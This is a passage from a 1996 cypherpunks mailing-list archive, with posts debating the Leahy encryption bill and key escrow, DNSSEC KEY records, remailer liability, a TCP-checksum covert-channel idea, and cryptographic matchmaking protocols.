>THAT THESE PEOPLE STOP GIVING AWAY YOUR RIGHTS!!!!!!!!!!!!!!!!!!!!!!!!!!!
>
>their addresses are
>       schneier@counterpane.com
>       mab@crypto.com
>       jim@rsa.com
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: uunet!in2.uu.net!newsfeed.internetmci.com!info.ucla.edu!ihnp4.ucsd.edu!pwa.acusd.edu!news@warwick.com
Date: Sun, 10 Mar 1996 22:58:44 +0800
To: cypherpunks@toad.com
Subject: test
Message-ID: <DnvEqp.8yM@pwa.acusd.edu>
MIME-Version: 1.0
Content-Type: text/html

Title: FractalNet Home Page
Test
---
Robert Uomini
The Fractal Images Company (http://www.fractals.com)
Voice: 510-528-0258/800-548-0258
Fax:   510-528-0243
*******************************************************************************
*  Buying or selling a home? Come visit the most comprehensive set of	      *
*  residential real estate listings and related services on the Internet:     *
*  The FractalNet Real Estate Server, http://www.fractals.com/realestate.html *
*******************************************************************************
----------
X-Fractalimgs-Data-Name: sample.html
X-Fractalimgs-Content-Length: 1255






This is a test of WebReader. This line should appear as text in the font chosen by the user, as defined in the Properties file. A horizontal rule follows:

FractalNet Advertisers

Unordered item #1
Unordered item #2
Unordered item #3
Unordered item #4

Ordered item #1
Ordered item #2
Ordered item #3
Ordered item #4


Ordered item #5
Ordered item #6
Ordered item #7
Ordered item #8


FTP icon

Swearest thou, ungracious boy? Henceforth, ne'er look upon me. There is a devil haunts thee in the likeness of an old, fat man. A tun of man is thy companion. Wherein is he neat and cleanly, but to carve a capon and to eat it? Wherein is he cunning, but in craft? Wherein is he crafty, but in villainy? Wherein is he villainous, but in all things? Wherein is he worthy, but in nothing?



Bob

Bob's address



Term 1:
This is the first definition
Term 2:
This is the second definition
Term 3:
This is the third definition








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald E. Eastlake 3rd" <dee@cybercash.com>
Date: Thu, 7 Mar 1996 18:05:01 +0800
To: Carl Ellison <cme@cybercash.com>
Subject: DNSSEC (was: A brief comparison of email encryption protocols)
In-Reply-To: <v02140b31ad6182e6d68c@[204.254.34.231]>
Message-ID: <Pine.SUN.3.91.960307005355.21875A-100000@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Mar 1996, Carl Ellison wrote:
> Date: Tue, 5 Mar 1996 00:34:41 -0500
> >From: Adam Shostack <adam@homeport.org>
> >Subject: Re: A brief comparison of email encryption protocols
> >To: ericm@lne.com (Eric Murray)
> >Date: Mon, 4 Mar 1996 21:18:41 -0500 (EST)
> >Cc: ericm@lne.com, perry@piermont.com, cme@cybercash.com, warlord@mit.edu,
> >        lgl@qualcomm.com, Cypherpunks@toad.com
> > ...
> >
> >| Along those lines, I was envisioning adding a KEY RR type to
> >| DNS, and using it to maintain pointers to keyservers.
> >
> >[...]
> >| This sounds so obvious that I'm sure that I'm not the first
> >| or even the tenth person to think of it, and in fact I
> >| see a KEY RR type defined in the BIND 4.9.3BETA17 source.  But
> >| there's just a type there, nothing else to support it.
> >| Anyone know what it's for?
> >
> >        Donald Eastlake is writing the spec for storing keys in
> >nameservers.  Its in the process of moving to draft standard; there
> >will probably be something about it after LA.  I think its:
> >
> >ftp://ds.internic.net/draft-ietf-dnssec-secext-09.txt

actually its in /internet-drafts/draft-ietf-dnssec-secext-09.txt on any of
the IETF shadow directory machines such as ftp.isi.edu or ds.internic.net via
ftp. 

It's up for Internet Proposed Standard and tehre were no objections at the
DNSSEC working group meeting this morning. It provides for KEY RRs and SIG
(signature) RRs.  I recommend people check it out.

> >Adam
> >
> >--
> >"It is seldom that liberty of any kind is lost all at once."
> >                                                       -Hume
> +--------------------------------------------------------------------------+
> |Carl M. Ellison          cme@cybercash.com   http://www.clark.net/pub/cme |
> |CyberCash, Inc., Suite 430                   http://www.cybercash.com/    |
> |2100 Reston Parkway           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2 |
> |Reston, VA 22091      Tel: (703) 620-4200                                 |
> +--------------------------------------------------------------------------+

Donald
=====================================================================
Donald E. Eastlake 3rd     +1 508-287-4877(tel)     dee@cybercash.com
   318 Acton Street        +1 508-371-7148(fax)     dee@world.std.com
Carlisle, MA 01741 USA     +1 703-620-4200(main office, Reston, VA)
http://www.cybercash.com           http://www.eff.org/blueribbon.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Thu, 7 Mar 1996 18:43:55 +0800
To: JonWienke@aol.com
Subject: Re: What's anyone know about Teledyne Electronic Technologies?
In-Reply-To: <960307014224_343625326@mail04.mail.aol.com>
Message-ID: <Pine.3.89.9603070009.A29145-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Mar 1996 JonWienke@aol.com wrote:

> >Teledyne (TET) is out marketing a "new" crypto system as a competitor 
> >against DES and what TET calls "linear" cryptosystems.  They are claiming 
> >a non-linear approach in which (as best I can tell) they are permuting 
> >the s-boxes and using 4 bit/16 entry substitution tables.
> 
> Dont trust it unless you are a good cryptanalyst and have a copy of the
> source code.  Most commercial crypto products are crap.

You'd be surprised how many of them are doing the "message XOR key" stuff
that so many of us wrote when were, as Roy Scheider put it in 'Blue
Thunder', "young and stupid".  Also, S-boxes are a fancy way of getting
yourself into a lot of trouble while promoting a false sense of security -
they are *very* hard to get right, and it takes a lot of work to prove
that you haven't introduced a weakness with the "improvement".  See "S-Box
Design" in Schneier's book, page 349 for a good intro to designing such. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 7 Mar 1996 18:26:26 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: new netscape servers
In-Reply-To: <313D5C6A.6A4A@netscape.com>
Message-ID: <Pine.SUN.3.91.960307012824.18627I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Mar 1996, Jeff Weinstein wrote:

> Alex Strasheim wrote:
> > But that doesn't mean we're powerless.  I think we ought to:
> > 
> > (1) form a new non-profit low cost CA
> 
>   I encourage you and anyone else who is interested to do this if you want
> to.  However I do suggest that you consult a lawyer, since there may be
> liability issues involved.  There are a lot of big and medium sized companies

Oh boy are there liability issues.  Talk to me if you seriously want to 
know a lot more.  (My paper on this will be out soonish....)

> that are entering or about to enter this market.  I'm sure there is room for
> some lean low cost ones too.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oscar Boykin <boykin@pobox.com>
Date: Thu, 7 Mar 1996 18:30:50 +0800
To: cypherpunks@toad.com
Subject: crypto ++ where?
Message-ID: <2.2.32.19960307063219.0097bc70@fitten95.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


How can I obtain crypto++, I seem to have deleted the email I had reguarding it.

any info would be appreciated.

thanks.

oscar boykin
mailto:boykin@pobox.com
http://pobox.com/~boykin
home: 404-206-0477





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Sun, 10 Mar 1996 21:55:30 +0800
To: cypherpunks@toad.com
Subject: TCP/IP Stego (was CU-SeeMe)
Message-ID: <Pine.A32.3.91.960307010925.29850B-100000@seminole.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



It seems to me that it would be possible to squeeze one bit of subliminal 
data into each tcp packet if you were willing to sacrifice a few cpu 
cycles in the process:
 
A tcp header contains quite a bit of useful information.. but most of it 
wouldnt be easily manipulated (by me) to get a bit. You cant very well 
alternate the port number you are using, or change the packet sequence 
numbers. However, the tcp protocol forces each tcp header to contain a 
'checksum' field.. which is (more or less) the sum of all the octets in 
the packet. This is used as error correction for the protocol. It 
shouldn't be too difficult to force TCP to fiddle with the data in the 
packet a bit to force the checksum to be a particular sort of thing (i.e. 
even or odd number) .. 0 for even and 1 for odd would get us our one 
bit of data per packet. 

I may be wrong, but im pretty certain that you could hack your client (an 
ftp client would be a good choice since it can easily be made to receive 
vast numbers of packets without attracting attention) and leave the basic 
tcp/ip stack untouched.  If your client figured out what sort of packet 
needed to be sent to get the right bit before passing it to the tcp stack 
then voila you have a subliminal channel.

Of course there are alot of other ways to go about it, im sure.. 


Benji





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Thu, 7 Mar 1996 18:26:38 +0800
To: cypherpunks@toad.com
Subject: Re: Boycott "Applied Cryptography" and AT&T and RSA
Message-ID: <960307014209_343625184@emout05.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>Bruce Schnier (Author of applied cryptography) and Matt Blaze (Who
>is a crypto bigwig at at&t) have made it clear that they support
>key escrow. Both have written letters in favor of the new crypto
>law, it creates a key escrow system and also other restricts on
>crypto. The letters are on the CDT homepage and i think were
>posted here.

Whoever wrote this crap is an idiot.  In the preface of Applied Cryptography,
(Page xx) on the subject of government key escrow, Schneier states:

    "Some dangerously Orwellian assumptions are at work here:  that the
government has the right to listen to private communications and that there
is something wrong with a private citizen trying to keep a secret from the
government.  ...this is the first time people have been forced to make
themselves available for surveillance.  These initiatives are not simple
government proposals in some obscure area; they are pre-emptive and
unilateral to usurp powers that previously belonged to the people.
    Clipper and Digital Telephony do not protect privacy; they force
individuals to unconditionally trust that the government will respect their
privacy.  ...
    The lesson here is that it is insufficient to protect ourselves with
laws; we need to protect ourselves with mathematics.  Encryption is too
important to be left solely to governments."

Schneier goes on to state that the purpose of the book is to ensure that
people will have access to strong crypto, even if it is outlawed.  It is hard
to interpret this as support for government key escrow.  Check your facts
before slandering people.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 10 Mar 1996 21:54:43 +0800
To: cypherpunks@toad.com
Subject: Re: What's anyone know about Teledyne Electronic Technologies?
Message-ID: <960307014224_343625326@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>Teledyne (TET) is out marketing a "new" crypto system as a competitor 
>against DES and what TET calls "linear" cryptosystems.  They are claiming 
>a non-linear approach in which (as best I can tell) they are permuting 
>the s-boxes and using 4 bit/16 entry substitution tables.

Dont trust it unless you are a good cryptanalyst and have a copy of the
source code.  Most commercial crypto products are crap.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@vplus.com (Dan Weinstein)
Date: Thu, 7 Mar 1996 18:12:06 +0800
To: cypherpunks@toad.com
Subject: Re: Boycott "Applied Cryptography" and AT&T and RSA
In-Reply-To: <199603062058.MAA28987@jobe.shell.portal.com>
Message-ID: <313e7e12.5256043@mail.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Mar 1996 12:58:20 -0800, you wrote:

>Bruce Schnier (Author of applied cryptography) and Matt Blaze (Who
>is a crypto bigwig at at&t) have made it clear that they support
>key escrow. Both have written letters in favor of the new crypto
>law, it creates a key escrow system and also other restricts on
>crypto. The letters are on the CDT homepage and i think were
>posted here.
>
>WHAT THE FUCK??????????????????????????????????????????
>
>EFF, EPIC, VTW and almost everyone else (except for Bizdos at RSA, hmmmm)
>have all come out against this piece of shit. But with these so called
>experts baking it it could pass anyway.
>
>Maybe the ltrs are a forgery? We should ask them, and if this is true, LETS
>SEND THEM A MESSAGE!!!!!!!! SWITCH YOUR PHONE SERVICE AND TELL AT&T WHY!!!
>STOP RECOMMENDING APPLIED CRYPTO (THERE ARE EASIER BOOKS ANYWAY). DEMAND
>THAT THESE PEOPLE STOP GIVING AWAY YOUR RIGHTS!!!!!!!!!!!!!!!!!!!!!!!!!!!
>
>their addresses are
>       schneier@counterpane.com
>       mab@crypto.com
>       jim@rsa.com

Don't you think you should read the bill prior to condmening those
that support it?

The bill states "Americans should be free to lawfully use whatever
particular encryption techniques, technologies, programs, or products
developed in the marketplace they desire in order to interact
electronically worldwide in a secure private, and confidential
manner;"

The bill gives everyone the right to use whatever publically available
encryption scheme they chose.  The provisions you refer to about key
esrow simply require the escrow agent to be responsible in handling
your key, this provision is to protect those that DICIDE VOLUNTARILY
to escrow keys.  In fact, the escrow agent would be criminally liable
for handing your key over to someone without a court order.  

Your assertion that everyone and his borther has rejected the bill is
simple non-sense.  The VTW and EPIC web pages contain positive, if not
rave reviews of the bill.

 

Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 7 Mar 1996 23:45:15 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re: Lawz to be.
Message-ID: <m0tuhAG-0008xNC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 07:31 PM 3/6/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>Cut & Paste
>>  "§2804. Unlawful use of encryption to obstruct justice"    
>>   "Whoever willfully endeavors by means of encryption to obstruct,   
>...

>
>>In any case, assuming they either never made the error you noticed, or they 
>>manage to correct it before the bill becomes law, they will have just 
>>outlawed the used of encrypted remailers, because:
>
>No, what the wording seems to outlaw was the use of encryption to obstruct 
>the commission of the crime, not the investigation.  Read it again please.

The wording of the paragraph is stilted and probably poorly written, as you 
noticed and as I've acknowledged.  Nevertheless, I think my objections are 
still valid:  If they get what they want, it will be possible for the 
government to _make_ encrypted remailers guilty of a crime, under the 
hypothetical scenario I mentioned before, with minor modifications depending 
on the law's exact phrasing.  The potential problem still exists.

In my opinion, if the underlying act they are describing is really illegal, 
and they can back up their claims with evidence, they should prosecute that 
act, NOT the use of encryption.  Yet another problem is that while the use 
of encryption today is comparatively rare and you have to go out of your way 
to use it, presumably we anticipate that both hardware and software 
developments will make use of encryption routine and ignorable.  

Imagine a world in which it was as difficult to NOT use good encryption as 
it is now to use it:  The government would suddenly be able to tack on 
another charge to just about every major crime.  Is that what you really want?


>>> Suspect  they meant to say "...obstruct (etc) the investigation of a
>>>felony..."
>
>>Probably.  This section is their wish-list to Santa Claus.  It's easy to 
>>make mistakes when you're excited about something.   They're hoping you 
>>suckers will support the whole bill despite this booby-trap.  
>
>Thought the gotcha was down in the part about the Secretary of Commerce. 

Well, I disagree.  There may, indeed, be a "gotcha" THERE, too, but I don't 
think that's  the main one.


>My reading is that the secretary will still be required to grant
>approval for commercial export. Is past the part about no regulation
>inside the US (which is true now - still would be nice to see a "Congress
>shall make no law...").

This is yet another reason that I'm opposed to this bill.  The "gains" we 
supposedly get are mostly re-statements of rights we already possess, but 
which the government has tried and mostly failed to curtail.  Why should we 
reward these people for stopping their attempts to steal from us?

> The puzzler is the requirement that a com
perable 
>foreign product must exist before permission to export will be granted.
>Will this be like "comparable product" price matching in discount houses ?
>Somehow there never is one...

That's another thing to be afraid of.  We're dependant on their 
interpretation of the law, and there's no reason to believe that they'll be 
generous once they have what they want.

>ps did you mean the Thomases and Memphis ? Not aware of similar 
>   prosecution in Oklahoma. 

My recollection of the details may be in error, but the principle and the 
problem remains:  The government clearly is willing to use a tactic which 
fabricates a crime, turning the victim into the "criminal."  There is no 
reason to believe that they won't try the same thing the moment a new 
"crime" is defined of using encryption. 


>Besides my understanding was that the online
>   stuff was dropped, the conviction was for stuff sent through the mails.
>   Is that incorrect ?

Is this relevant?  I mean, have YOU ever been prosecuted for a crime before? 
 Especially one that you didn't intend to commit?  Do you know how much it 
costs to defend yourself, even before the trial?  Do you know how much a 
trial will cost you?  Did you know that you aren't reimbursed if the verdict 
is "not guilty" or the charges are dropped?  

This is called "deterrence", dammit!

Encrypted remailers aren't in it for the money.  They don't have a "legal 
budget."  They would be severely dissuaded if there was even a possibility 
that the government could decide to start harassing them.  Surely you see that!

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT751/qHVDBboB2dAQGZMQP/fJ7SMKwvZEZjg3KGgF1WE7jtYnetMv9+
v/4+0ezJ4GVRt0rkPX1YGjJxpQEk73d+J78zxHi87hQq8WBXRz4pNWGBGRMu0iqG
fk0N2FTXxIFivsqu0vZLW5zVYs0W9v1ZGN4jFQ3vYCMIhzP8ig8gQrATOnag1Vmu
EPUZdCnsAxw=
=1OLz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Fri, 8 Mar 1996 01:45:07 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: forwarded message from Kendall Collett
In-Reply-To: <199603071544.JAA07912@kenya.tivoli.com>
Message-ID: <199603071552.HAA23865@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> [homepage on IO]
> 
> BTW, did you hear that IO got on the SurfWatch "bad list" because there
> were more than 25 complaints about objectionable material in the io.com
> domain.  (Apparently, when SurfWatch hears more than 25 complaints
> against a particular domain, the just deny access to the whole domain
> rather than particular URLs.)

So.. whats the number to call? Microsoft has material on their site I
object too. =)

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 10 Mar 1996 01:55:33 +0800
To: cypherpunks@toad.com
Subject: Re: Switchboard
Message-ID: <v02120d16ad6499bcc341@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:27 AM 3/7/96, Bill Frantz wrote:


> I checked them out and the couldn't find my record.  Since I have a listed
> telephone number, I can only assume that their records do not include GTE
> local service records or some other equally huge gap.

I was messing around with this a year and a half ago (woulda shoulda
coulda), and my guess is they're using Reuben Donnelly's database. They're
the largest phonebook printer, and they even go so far as to OCR a lot, but
apparently not all, of their competition.

They say 90 million names, and that seems to be the number I was quoted...

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Fri, 8 Mar 1996 02:28:26 +0800
To: JonWienke@aol.com
Subject: Re: What's anyone know about Teledyne Electronic Technologies?
Message-ID: <199603071709.JAA17447@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:42 AM 3/7/96 -0500, you wrote:
>>Teledyne (TET) is out marketing a "new" crypto system as a competitor 
>>against DES and what TET calls "linear" cryptosystems.  They are claiming 
>>a non-linear approach in which (as best I can tell) they are permuting 
>>the s-boxes and using 4 bit/16 entry substitution tables.
>
>
A couple of points:
1. DES is nonlinear and (I believe) provably not a group; that TET is
alluding to DES being linear casts grave doubt.  If their S-Box "permutes"
I'd also be concerned!


>Dont trust it unless you are a good cryptanalyst and have a copy of the
>source code.  Most commercial crypto products are crap.
>
>Jonathan Wienke
>

2. Most NEW UNPROVEN CRYPTOSYSTEMS are crap, not crypto products.  That's
too strong an assertion.  Plenty of commercial crypto products(and perhaps
"most" which in significant commercial disctribution) are based on strong
DES/RSA, etc. proven technologies.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Mar 1996 04:50:33 +0800
To: "A. Padgett Peterson P.E. Information Security" <cypherpunks@toad.com
Subject: Re: Anonymous remailers and Leahy bill
Message-ID: <m0tujNS-0008xiC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:26 AM 3/7/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>
>>I am assuming they fix the obvious error in the phrasing above.  
>
>Until they do, we can only guess at the intent.
>
>>"Thanks for the use of your nifty anonymous remailer.  Under a different 
>>name, I intend to use this remailer (along with others) to transmit child 
>>pornography, plot terrorism, and do all of my drug deals.  You've made my 
>>life so much more secure!"
>
>At this point, Bob has no choice other than to reply with: "I assume you are 
>joking however since what you have stated is in violation of numerous laws,
>we have no choice other than to disable your account. If we find that 
>illegal acts have been committed using this remailer, we will have no choice
>other than to report such actions."

Wouldn't help "Bob" in the least.  And you didn't read what I wrote very 
carefully, either:  Notice that I said, "under a different name."  In other 
words, the source of the note does not identify the user name under which 
the illegal activity is promised to occur.  Cancelling this particular 
fellow's account does NOTHING to prevent the illegal activity from 
occurring by other, unidentified users, and "Bob" knows it.

Moreover, such a statement (by Bob)  would be considered deliberately 
ineffective:  Any anonymous encrypted remailer operator is perfectly aware 
that his remailer can be used for illegal purposes without him ever finding 
out.  If the law was written carefully enough, that mere knowledge would 
make it a crime to continue to operate that remailer unless its use could be 
monitored and verified to be legal.  Technically, encryption would not be 
illegal, but using encryption would open one up to harrassment by 
government.   This would become a de-facto ban, at least for whoever was on 
the government's "shit list" that week.

>Anyone stupid enough to make a statement like this deserves to be disabled.

Anyone stupid enough to misinterpret what I clearly wrote above deserves to 
be lambasted.


>>At that point, Bob is GUILTY of violation of the Leahy bill, because his 
>>encrypted anonymous remailer:
>
>No, if Bob were to follow the above scenario, he would already be guilty of
>terminal stupidity.

Poor response, and inaccurate too.


>>So maybe the word gets out, occasionally.  At that point, usage of anonymous 
>>remailers declines, and people willing to risk operating one declines.  A 
>>few come up which are run by the Feds, which log anyone who  attempts to use 
>>it...
>
>Declines ? They are only protection from amateurs. Do you really not 
>believe that everything in and out of anon.penet.fi & others is not 
>monitored *at the ISP/carrier level* ?

I am well aware of the possibilities.  But you just destroyed your own 
argument:  If the government is already capable of tracing such messages, 
and is doing so, it is presumably doing so illegally, or this tracing SHOULD 
be illegal.  If the government is already doing that, then we'd damn well 
look VERY carefully at any new bills that are proposed to regulate 
encryption, because we have far more to fear from them than they currently 
let on.

>						Warmly,
>				
			Padgett

I'm disgusted by your "Warmly, Padgett."  

While I  don't sympathize with their motivations, the "red-hunters" of the 
early 1950's had a term, "pink" to describe a person who was unduly 
sympathetic to the Communist cause:  A person who was just a bit too cozy 
with their philosophy.  Not quite "red," but...

In the 1990's encryption debates, you're a bit too "pink" on the 
pro-government side for me.

With generous amounts of disgust,

Jim Bell
jimbell@pacifier.com

.....Klaatu Burada Nikto
  

  

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT8axfqHVDBboB2dAQHp5AP5AeJ8dPNy9Hkbvyrk6QD/pIIEz7ZeLK3l
V2O7zD9Fsvtb6KfIlczX6wpWXOM3RTvgItASg8yNnibLwT37vCKkrpkWKujjIUKb
CXGZPZaHGMAAOc9+nU5OzjsAS4IyFuycOlP5z7PlpEap9xo4DlQFJwpgFxHeu53E
B3277PHwak4=
=5Ff6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Mar 1996 23:31:09 +0800
To: cypherpunks@toad.com
Subject: Re: Jump Start ecash With IPhone
Message-ID: <2.2.32.19960307143411.0074be14@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:49 PM 3/6/96 -0800, Jim McCoy wrote:

>Just because LD is "deregulated" does not mean that it is without any
>governmental oversight, much as I wish it were...  LD companies still
>have to pay certain taxes (take a look at your next phone bill, they are
>clearly listed in addition to your actual phone charges) and I am certain
>that they have entire office buildings stuffed with drones filling out
>paperwork for Uncle Sam...
>
>jim
>

Granted.  Of course it is quite a jump to claim that a software program is a
"Long Distance Carrier."  If I run Winsock on my machine and a Winsock
application like Iphone, if anyone is the LD carrier, *I* am because I am
digitizing my voice and doing the first part of the switching necessary to
send the packets on their way.  Maybe the FCC should bust *me* for
practicing telecommunications without a license.  It would make for an
interesting case.

DCF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Mar 1996 23:14:29 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: new netscape servers
Message-ID: <2.2.32.19960307143422.0073f934@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:29 AM 3/7/96 -0500, Michael Froomkin wrote:

>Oh boy are there liability issues.  Talk to me if you seriously want to 
>know a lot more.  (My paper on this will be out soonish....)
>

However, a CA operating outside the licensing structure of current CA's
would have very low costs and hence no investment to lose in litigation.
Costs would be almost entirely marketing related and as long as you stayed
out of jurisdictions with some of the new CA law, no regulatory costs or
barriers.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 8 Mar 1996 01:25:06 +0800
To: cypherpunks@toad.com
Subject: forwarded message from Kendall Collett
Message-ID: <199603071544.JAA07912@kenya.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



Boy, this net filtering sure is high-tech.

------- start of forwarded message (RFC 934 encapsulation) -------
From: Kendall Collett <kcollett@ker-plop.tivoli.com>
To: m5@dev.tivoli.com (Mike McNally)
Subject: IO is officially bad (was Re: clavicle)
Date: Thu, 07 Mar 1996 09:42:28 -0600
Message-Id: <9603071542.AA20096@ker-plop.tivoli.com>
In-Reply-To: Your message of Fri, 01 Mar 1996 12:36:39 CST.
Reply-To: Kendall Collett <kcollett@tivoli.tivoli.com>

[homepage on IO]

BTW, did you hear that IO got on the SurfWatch "bad list" because there
were more than 25 complaints about objectionable material in the io.com
domain.  (Apparently, when SurfWatch hears more than 25 complaints
against a particular domain, the just deny access to the whole domain
rather than particular URLs.)

Kendall
------- end -------

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 8 Mar 1996 05:42:12 +0800
To: cypherpunks@toad.com
Subject: Re: Square pegs in round holes, matchmaking, corporate mailservers
Message-ID: <199603071812.KAA16510@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Bill Stewart <stewarts@ix.netcom.com>
> [>>Dimitris Tsapakidis <dimitrt@dcs.rhbnc.ac.uk> wrote:]
> >  >Bob must find out whether Alice has declared (commited) her interest
> >  >in him, if and only if he has declared (commited) his interest in her.
> >  >Before he does so, he can at most know that a girl is interested in him.
> >  >Another description: Bob and Alice can have a date if they both commit
> >  >to each other. If only one commits, nobody will ever find out about it.
> >  >- T is the trusted third party.
> [Padgett contribution elided]
> Oh, that would work fine.  Let a, b, and t be Alice, Bob, and Trent's secret DH
> keys, and g and p be the generator and prime (all math below is mod p.)
> If Bob wants to talk to Alice, he sends Trent B = g**b, marked "For Alice",
> optionally anonymously.  Trent calculates X = B**t == g**bt, and sends it to
> Alice.
> Alice calculates K = X**a == g**bat, calculates H = Hash(K) and 
> posts it anonymously, or sends it to Trent to post or mail to Bob. 
> If Alice wants to talk to Bob, she calculates A = g**a mod p,
> sends it to Trent, optionally anonymously, marked "For Bob".
> Trent calculates Y = A**t == g**at , and sends it to Bob.  
> Bob calculates K' = Y**b == g**abt, calculates H' = Hash(K') and
> notices that it's the same as the H he pulled off the net earlier.
> Bob says "Oh, wow!  Alice wants to talk to me!", encrypts some lame drivel 
> of a message M with key K'==K, and mails it to Alice if he knows her address
> or posts it with Subject: H', which Alice receives.

I don't think this satisfies the requirements.  Once Bob calculates H'
and sees that it matches H, he knows that Alice likes him, but Alice
doesn't know that he likes her.  The whole point of the protocol was to
be fair.  Bob must only learn that Alice likes him if Alice is guaranteed
to learn that he likes her.

I have posted an alternate solution in another message.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 8 Mar 1996 05:36:51 +0800
To: cypherpunks@toad.com
Subject: Re: Square pegs in round holes, matchmaking, corporate mailservers
Message-ID: <199603071824.KAA17363@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dimitris Tsapakidis <dimitrt@dcs.rhbnc.ac.uk> wrote:
>Bob must find out whether Alice has declared (commited) her interest
>in him, if and only if he has declared (commited) his interest in her.
>Before he does so, he can at most know that a girl is interested in him.
>Another description: Bob and Alice can have a date if they both commit
>to each other. If only one commits, nobody will ever find out about it.

To avoid a trusted intermediary, the problem can be thought of as a
secure multi-party communication problem with private inputs, which is
much studied in the literature.  The easiest formulation is pairwise:
Alice and Bob mutually engage in the calculation of "Alice loves Bob"
AND "Bob loves Alice".  Each inputs his feelings as an input bit, and
the output will be true only if they have mutual feelings.  Each pair of
potential lovers would then go through the protocol with each other.

This problem is solved in "Multiparty Computations Ensuring Privacy of
Each Party's Input and Correctness of the Result", by Chaum, Damgard,
and van de Graaf, in the proceedings of the Crypto 87 conference.  They
